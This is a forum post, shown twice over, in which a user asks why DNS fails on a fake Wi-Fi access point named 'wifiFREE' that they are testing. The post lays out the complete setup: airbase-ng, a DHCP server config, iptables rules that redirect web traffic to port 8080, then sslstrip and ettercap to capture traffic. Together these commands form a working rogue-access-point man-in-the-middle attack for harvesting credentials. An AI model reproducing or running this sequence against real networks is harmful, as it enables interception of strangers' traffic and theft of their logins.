1
Hacking and Security / FAKE AP - trouble with dns
« on: November 22, 2014, 11:05:39 am »
Hi everybody.
I'm writing because i can't find any solution for my problem.
I'm testing on my network a FAKE AP, but i've a trouble with dns
My configuration is:
wlan0 is wireless network linked to my lan network
wlan1 is my ALFA Network that i want to use as fake ap
my ifconfig is:
eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:fc600000-fc620000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:228504 errors:0 dropped:0 overruns:0 frame:0
TX packets:228504 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:34120287 (32.5 MiB) TX bytes:34120287 (32.5 MiB)
wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208708 errors:0 dropped:0 overruns:0 frame:0
TX packets:125550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:159616952 (152.2 MiB) TX bytes:17668703 (16.8 MiB)
wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
and my route -n is:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0
i've submit this command:
apt-get install dhcp3-server
gedit /etc/dhcpd.conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 172.16.77.0 netmask 255.255.255.0 {
option routers 172.16.77.254;
option subnet-mask 255.255.255.0;
option domain-name "wifiFREE";
option domain-name-servers 172.16.77.254;
range 172.16.77.2 172.16.77.20;
}
airmon-ng
airmon-ng start wlan1
airbase-ng -c 11 -e wifiFREE mon0
ifconfig at0 172.16.77.254 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
sslstrip -l 8080
ettercap -p -u -T -q -i at0
my ipad connected very well to fake network wifiFREE but when i open safarii cannot view any webpage. If with fing i ping 8.8.8.8 i've response and if in safari navigate to ip address i can see webpages.
I've try also with:
option domain-name-servers 8.8.8.8, 172.16.77.254;
but even so I cannot see web pages.
I'm going crazy and I cannot find any solution.
Please help me! TIA
I'm writing because i can't find any solution for my problem.
I'm testing on my network a FAKE AP, but i've a trouble with dns
My configuration is:
wlan0 is wireless network linked to my lan network
wlan1 is my ALFA Network that i want to use as fake ap
my ifconfig is:
eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Memory:fc600000-fc620000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:228504 errors:0 dropped:0 overruns:0 frame:0
TX packets:228504 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:34120287 (32.5 MiB) TX bytes:34120287 (32.5 MiB)
wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208708 errors:0 dropped:0 overruns:0 frame:0
TX packets:125550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:159616952 (152.2 MiB) TX bytes:17668703 (16.8 MiB)
wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
and my route -n is:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0
i've submit this command:
apt-get install dhcp3-server
gedit /etc/dhcpd.conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 172.16.77.0 netmask 255.255.255.0 {
option routers 172.16.77.254;
option subnet-mask 255.255.255.0;
option domain-name "wifiFREE";
option domain-name-servers 172.16.77.254;
range 172.16.77.2 172.16.77.20;
}
airmon-ng
airmon-ng start wlan1
airbase-ng -c 11 -e wifiFREE mon0
ifconfig at0 172.16.77.254 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
sslstrip -l 8080
ettercap -p -u -T -q -i at0
my ipad connected very well to fake network wifiFREE but when i open safarii cannot view any webpage. If with fing i ping 8.8.8.8 i've response and if in safari navigate to ip address i can see webpages.
I've try also with:
option domain-name-servers 8.8.8.8, 172.16.77.254;
but even so I cannot see web pages.
I'm going crazy and I cannot find any solution.
Please help me! TIA